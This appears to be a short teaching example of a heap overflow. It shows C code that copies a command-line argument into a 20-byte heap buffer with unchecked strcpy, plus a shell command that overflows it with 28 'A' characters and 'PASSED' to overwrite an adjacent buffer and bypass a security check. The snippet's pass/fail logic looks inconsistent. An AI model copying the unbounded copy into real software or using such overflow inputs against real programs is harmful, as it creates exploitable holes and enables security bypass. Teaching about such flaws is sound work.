Heap Overflow – Simple Example
char *buf1 = malloc(20);
char *buf2 = malloc(10);

strcpy(buf1,argv[1]);

// perform security check and store the results in
// buf2
while(strlen(buf2) < 1) {
….
} // end of while security check loop
if(!strcmp(buf2,“PASSED”))
exit(0);
else {  // continue doing stuff only if we passed      
        // security check
./bad_heap_example `perl -e ‘print “A”x28’`PASSED